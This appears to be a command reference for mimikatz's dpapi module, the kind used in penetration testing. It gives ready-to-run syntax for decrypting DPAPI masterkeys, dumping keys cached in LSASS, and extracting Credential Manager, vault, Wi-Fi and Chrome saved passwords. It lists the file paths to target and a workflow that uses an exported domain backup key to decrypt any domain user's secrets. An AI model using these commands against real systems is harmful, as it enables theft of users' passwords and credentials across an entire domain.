dpapi
Data Protection API (DPAPI) operations. Decrypt blobs, extract master keys, recover credentials protected by user or domain context.
DPAPI Hierarchy
Blob (encrypted data)
<- protected by -> Masterkey (encrypted raw key)
<- protected by -> User credentials (SID + password hash) OR Domain backup key
masterkey β Work with Masterkey Files
Decrypt or operate on DPAPI masterkey files.
mimikatz # dpapi::masterkey /in:<masterkey-file> [/password:<password>] [/hash:<nt-hash>] [/sid:<sid>] [/pvk:<domain-backup-key.pvk>] [/rpc] [/dc:<dc-ip>]
Options
/in:<file>β path to masterkey file (usually in%APPDATA%\Microsoft\Protect\<SID>\)/password:<password>β user's plaintext password/hash:<nt-hash>β user's NTLM hash (SHA1 of NT hash used internally)/sid:<sid>β user's SID/pvk:<file>β domain backup key PVK file (fromlsadump::backupkeys)/rpcβ use RPC to domain controller for decryption/dc:<dc-ip>β domain controller IP/FQDN
Examples
# Decrypt with user password
mimikatz # dpapi::masterkey /in:"C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<sid>\<guid>" /password:<password>
# Decrypt with domain backup key (works for any domain user)
mimikatz # dpapi::masterkey /in:<masterkey-file> /pvk:ntds_capi_0_domain-backup-key.pvk
# Decrypt via DC RPC (if SYSTEM or DA)
mimikatz # dpapi::masterkey /in:<masterkey-file> /rpc
cache β Display Cached Master Keys
Show master keys cached in the current LSASS session (available in memory).
mimikatz # dpapi::cache
blob β Decrypt DPAPI Blob
Decrypt an arbitrary DPAPI encrypted blob.
mimikatz # dpapi::blob /in:<blob-file> [/masterkey:<hex-key>] [/unprotect] [/entropy:<hex>]
Options
/in:<file>β DPAPI blob file/masterkey:<hex-key>β decrypted master key (fromdpapi::masterkeyordpapi::cache)/unprotectβ use CryptUnprotectData for current user context/entropy:<hex>β optional entropy bytes if blob was protected with entropy
protect β Encrypt Data with DPAPI
Encrypt data using DPAPI.
mimikatz # dpapi::protect /data:<hex-data> [/entropy:<hex>]
credhist β Credential History
Work with credential history files (previous password hashes for masterkey decryption across password changes).
mimikatz # dpapi::credhist /in:<credhist-file> /sid:<sid>
cred β Extract DPAPI-Protected Credentials
Decrypt Windows Credential files (Credential Manager, vault, etc.).
mimikatz # dpapi::cred /in:<credential-file> [/masterkey:<hex-key>]
Credential file locations
%APPDATA%\Microsoft\Credentials\
%LOCALAPPDATA%\Microsoft\Credentials\
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\
vault β Extract Vault Files
Decrypt Windows Vault policy and credential files.
mimikatz # dpapi::vault /in:<vault-file> [/masterkey:<hex-key>]
wifi β Extract Wi-Fi Credentials
mimikatz # dpapi::wifi [/unprotect]
chrome β Extract Chrome Credentials
Decrypt Chrome/Chromium stored passwords.
mimikatz # dpapi::chrome /in:<login-data-file> [/masterkey:<hex-key>]
Chrome's Login Data file: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data
Common Workflow: Domain-Wide DPAPI Decryption
# 1. Get domain backup key (DA required)
mimikatz # lsadump::backupkeys /system:<dc-fqdn> /export
# 2. Decrypt any user's masterkey with backup key
mimikatz # dpapi::masterkey /in:<masterkey-file> /pvk:ntds_capi_0_domain-backup-key.pvk
# 3. Use decrypted key to decrypt blobs/credentials
mimikatz # dpapi::cred /in:<cred-file> /masterkey:<hex-key>
Common Workflow: Current User DPAPI Decryption
# Via RPC to DC (any domain account)
mimikatz # dpapi::masterkey /in:<masterkey-file> /rpc
# Using known user password
mimikatz # dpapi::masterkey /in:<masterkey-file> /sid:<sid> /password:<password>
Notes
- Master key files are in
%APPDATA%\Microsoft\Protect\<SID>\<GUID>(user) or%WINDIR%\System32\Microsoft\Protect\S-1-5-18\User\(machine/SYSTEM) - Domain backup key decrypts any domain user's masterkeys β extremely powerful
- LSASS caches decrypted masterkeys in memory β
dpapi::cacheextracts them if already used